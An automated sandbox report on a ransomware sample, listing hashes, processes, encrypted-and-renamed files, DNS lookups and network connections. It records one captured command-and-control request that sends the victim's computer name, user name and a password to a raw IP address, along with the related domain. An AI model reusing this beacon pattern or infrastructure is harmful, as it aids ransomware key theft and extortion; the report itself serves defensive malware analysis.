File name:

HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.7z

Full analysis: https://app.any.run/tasks/7456aa43-3426-4b17-836f-b5c429d44a87
Verdict: Malicious activity
Threats:

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

Analysis date: April 11, 2025, 20:59:10
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-exec
ransomware
Indicators:
MIME: application/x-7z-compressed
File info: 7-zip archive data, version 0.4
MD5:

DB80FE9B8ECFE931441975E1BC1F5E6E

SHA1:

B7CFB8C75451191504CE0FCB9916A524D2826BB4

SHA256:

10629567D3EA57B5857CF791419F2C912E4C348B0167FE1B321F074830AF995A

SSDEEP:

24576:htNnF3uZnrf88PVqxez6yJBqDbn/ERwXA37ZO:hHnF3uZnrf88PVqxez6SBqDbn/ERww34

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 7312)
    • Renames files like ransomware

      • HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe (PID: 8000)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe (PID: 8000)
    • Connects to the server without a host name

      • HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe (PID: 8000)
  • INFO

    • Checks supported languages

      • HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe (PID: 8000)
    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 7312)
    • Manual execution by a user

      • HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe (PID: 8000)
      • notepad.exe (PID: 2140)
    • Reads the machine GUID from the registry

      • HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe (PID: 8000)
    • Checks proxy server information

      • HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe (PID: 8000)
    • Reads the computer name

      • HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe (PID: 8000)
    • Disables trace logs

      • HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe (PID: 8000)
    • Reads the software policy settings

      • HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe (PID: 8000)
    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 2140)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.7z | 7-Zip compressed archive (v0.4) (57.1)
.7z | 7-Zip compressed archive (gen) (42.8)

EXIF

ZIP

FileVersion: 7z v0.04
ModifyDate: 2020:09:07 12:23:40+00:00
ArchivedFileName: HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
5
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe sppextcomobj.exe no specs slui.exe no specs heur-trojan-ransom.msil.agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe notepad.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2140"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\READ_IT.txtC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
7312"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.7zC:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
7456C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7488"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exeSppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
8000"C:\Users\admin\Desktop\HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe" C:\Users\admin\Desktop\HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Description:
fuckunicorn
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\desktop\heur-trojan-ransom.msil.agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
Total events
2 331
Read events
2 298
Write events
33
Delete events
0

Modification events

(PID) Process:(7312) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(7312) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(7312) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(7312) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.7z
(PID) Process:(7312) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(7312) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(7312) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(7312) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(7312) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface
Operation:writeName:ShowPassword
Value:
0
(PID) Process:(7312) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\MainWin
Operation:writeName:Placement
Value:
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF3D0000002D000000FD03000016020000
Executable files
2
Suspicious files
61
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
8000HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exeC:\Users\admin\Desktop\matotal.rtfbinary
MD5:F23839A8527D48AC32C3D800615BF22B
SHA256:E53CE354E195D950A01E3D3005CACF48AB64C237B761217E05390D21512A0CE1
8000HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exeC:\Users\admin\Desktop\indexunion.jpg.fuckunicornhtrhrtjrjybinary
MD5:F6E7E7E5BA7692B9C9A8FD9559D1AEF4
SHA256:076651253DB436D4958D8D621B881EA8F77F5A868E90961F4DB5121CFDD73189
8000HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exeC:\Users\admin\Desktop\employeesbuilding.rtf.fuckunicornhtrhrtjrjybinary
MD5:36F6062A5765030217CF9ACF4B5C6614
SHA256:DFF320452A857CE3FAC09A634D05C161C98CD9DD94CBDC4C8C774B8237B2A118
8000HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exeC:\Users\admin\Desktop\learnidea.rtfbinary
MD5:92F66688DF326441735DB6104F86FC79
SHA256:F9B6506886B2829127695816FDFD4D9B53B89C54E518BFC155A1F313806D2D30
8000HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exeC:\Users\admin\Desktop\matotal.rtf.fuckunicornhtrhrtjrjybinary
MD5:F23839A8527D48AC32C3D800615BF22B
SHA256:E53CE354E195D950A01E3D3005CACF48AB64C237B761217E05390D21512A0CE1
8000HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exeC:\Users\admin\Desktop\newswww.jpgbinary
MD5:6159F95634BAE2BBBCFA46C0AF27A1FC
SHA256:26F7107766C7B9FAC61F046BAE366D86E754CA63A2D4E20941A4F3749B1B0709
8000HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exeC:\Users\admin\Desktop\partnerstage.jpg.fuckunicornhtrhrtjrjybinary
MD5:E7542C355F947BF94FC8979D86883313
SHA256:A707D60D4EAAD6C65348A5346DE0BD27F69E0C2AE28F27FE359925A7ECD9F551
8000HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exeC:\Users\admin\Desktop\orderrussian.jpg.fuckunicornhtrhrtjrjybinary
MD5:99213E23E37D3801EBDF1B50D4EDA9A5
SHA256:1A165BDC1D91C118603A1CBADF5FFAC2B256D5DFDA4D8FD34CB0193FA9A7C781
8000HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exeC:\Users\admin\Desktop\redconstruction.rtfbinary
MD5:9C1B5E9E7444BAE546628047C7DD6D0E
SHA256:FC22B7A6B40FA20C2C6A0D1D8FEB48D8F95CC751C3024D8EBAF612EC71BE0CCC
8000HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exeC:\admin\Rand123\local.exeexecutable
MD5:B226803AC5A68CD86ECB7C0C6C4E9D00
SHA256:7980EF30B9BED26A9823D3DD5746CDEFE5D01DE2B2EB2C5E17DBFD1FD52F62BF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
23
DNS requests
15
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.19.11.105:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
8000
HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe
GET
301
116.203.210.127:80
http://116.203.210.127/write.php?computer_name=DESKTOP-JGLLJLD&userName=admin&password=RgZ97nU*0PNQzwi&allow=ransom
unknown
unknown
4812
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4812
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2104
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.19.11.105:80
crl.microsoft.com
Elisa Oyj
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.160.5:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
8000
HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe
142.250.186.68:443
www.google.com
GOOGLE
US
whitelisted
8000
HEUR-Trojan-Ransom.MSIL.Agent.gen-7980ef30b9bed26a9823d3dd5746cdefe5d01de2b2eb2c5e17dbfd1fd52f62bf.exe
199.232.196.193:443
i.imgur.com
FASTLY
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 2.19.11.105
  • 2.19.11.120
whitelisted
google.com
  • 142.250.186.46
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
login.live.com
  • 20.190.160.5
  • 20.190.160.17
  • 40.126.32.72
  • 40.126.32.138
  • 20.190.160.67
  • 40.126.32.133
  • 20.190.160.132
  • 20.190.160.2
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
www.google.com
  • 142.250.186.68
whitelisted
i.imgur.com
  • 199.232.196.193
  • 199.232.192.193
whitelisted
conciliaya.com
  • 116.203.210.127
unknown
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Image Sharing Service (imgur.com)
No debug info